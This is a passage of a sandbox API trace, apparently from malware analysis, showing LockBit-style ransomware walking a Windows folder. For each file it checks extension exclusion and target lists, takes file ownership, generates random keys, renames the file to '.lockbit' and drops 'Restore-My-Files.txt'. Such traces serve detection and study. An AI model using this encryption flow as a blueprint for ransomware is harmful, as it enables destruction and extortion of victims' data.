PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0082.287] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0082.287] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.287] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef5e1f2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef5e1f2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x520150, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0082.287] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.287] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.287] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0082.287] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.287] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.287] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.287] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.288] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.288] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.288] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.288] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.288] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.289] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.289] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.289] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.289] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.289] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.289] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.289] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.289] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.289] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.289] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.289] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.290] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.290] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.290] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.290] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0082.290] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png") returned=".png" [0082.290] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.290] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.290] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.290] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.291] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.291] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.291] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.291] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.291] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.291] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.291] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.291] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.291] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.291] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.291] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.lockbit") returned 92 [0082.291] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.295] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.295] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.295] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.296] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.296] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.296] RtlFreeAnsiString (AnsiString="\\") [0082.296] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0082.296] malloc (_Size=0x200) returned 0x77d800 [0082.296] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0082.296] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.296] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.296] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.297] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.297] CloseHandle (hObject=0x3b4) returned 1 [0082.297] free (_Block=0x77d800) [0082.297] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0082.298] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.298] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.298] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3118) returned 1 [0082.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.299] ReadFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.301] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.301] malloc (_Size=0xce) returned 0x77d800 [0082.301] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0082.302] free (_Block=0x77d800) [0082.302] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0082.302] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0082.302] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.302] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x520150, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0082.302] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.302] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.302] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0082.302] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.303] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.303] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.303] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.303] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.304] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.304] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.304] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.304] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.304] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.304] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.304] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.304] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.305] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.305] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.305] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.305] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.305] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.305] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.305] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0082.305] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.305] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0082.305] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png") returned=".png" [0082.305] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.305] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.305] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.305] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.305] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.305] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.305] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.305] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.305] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.306] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.306] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.306] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.306] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.306] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.306] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.306] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.307] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.307] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.lockbit") returned 83 [0082.307] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.307] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.307] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.308] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.308] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.308] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.308] RtlFreeAnsiString (AnsiString="\\") [0082.308] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0082.308] malloc (_Size=0x200) returned 0x77d800 [0082.308] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0082.308] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.308] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.308] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.309] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.309] CloseHandle (hObject=0x3ac) returned 1 [0082.309] free (_Block=0x77d800) [0082.309] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0082.310] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.310] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.310] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4955) returned 1 [0082.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.311] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.316] malloc (_Size=0xbc) returned 0x77d800 [0082.316] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0082.317] free (_Block=0x77d800) [0082.317] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0082.317] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0082.317] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.317] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x520150, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0082.317] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.317] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0082.317] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0082.317] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 